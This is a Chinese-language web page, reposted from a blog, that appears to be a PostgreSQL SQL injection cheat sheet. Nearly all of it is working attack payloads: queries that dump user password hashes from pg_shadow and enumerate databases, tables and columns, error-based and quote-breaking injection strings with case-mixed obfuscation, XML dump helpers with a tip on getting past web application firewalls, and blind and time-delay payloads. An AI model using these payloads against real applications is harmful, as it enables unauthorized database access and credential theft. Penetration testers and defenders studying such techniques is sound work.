1. 极安网首页
  2. 网络安全技术

PostgreSQL数据库SQL注入方法大全

PostgreSQL数据库SQL注入方法大全-极安网

0x00 Sqli

1、注释

--
/**/

2、查询版本

SELECT version()

3、查询用户

SELECT user;
SELECT current_user;
SELECT session_user;
SELECT usename FROM pg_user;
SELECT getpgusername();

4、列用户

SELECT usename FROM pg_user

5、列举用户hash

SELECT usename, passwd FROM pg_shadow

6、列出数据库管理员帐户

SELECT usename FROM pg_user WHERE usesuper IS TRUE

7、列举权限

SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user

8、列举当前db名称

SELECT current_database()

9、列举db

SELECT datname FROM pg_database

10、列举表名

SELECT table_name FROM information_schema.tables

11、列举列名

SELECT column_name FROM information_schema.columns WHERE table_name='data_table'

12、报错注入

,cAsT(chr(126)||vErSiOn()||chr(126)+aS+nUmeRiC)
,cAsT(chr(126)||(sEleCt+table_name+fRoM+information_schema.tables+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name='data_table'+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
,cAsT(chr(126)||(sEleCt+data_column+fRoM+data_table+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)

' and 1=cast((SELECT concat('DATABASE: ',current_database())) as int) and '1'='1
' and 1=cast((SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET data_offset) as int) and '1'='1
' and 1=cast((SELECT column_name FROM information_schema.columns WHERE table_name='data_table' LIMIT 1 OFFSET data_offset) as int) and '1'='1
' and 1=cast((SELECT data_column FROM data_table LIMIT 1 OFFSET data_offset) as int) and '1'='1

13、xml helper

select query_to_xml('select * from pg_user',true,true,''); -- 可返回所有结果,可在报错注入中使用,另外query语句是个string就行,可进行拼接等方式进行waf绕过
select database_to_xml(true,true,''); -- dump the current database to XML
select database_to_xmlschema(true,true,''); -- dump the current db to an XML schema

14、盲注

' and substr(version(),1,10) = 'PostgreSQL' and '1 -> OK
' and substr(version(),1,10) = 'PostgreXXX' and '1 -> KO

15、延时注入

AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))
AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))

本文转载:Evi1cg's blog,不代表 极安网 立场,转载请注明出处:https://secvery.com/3131.html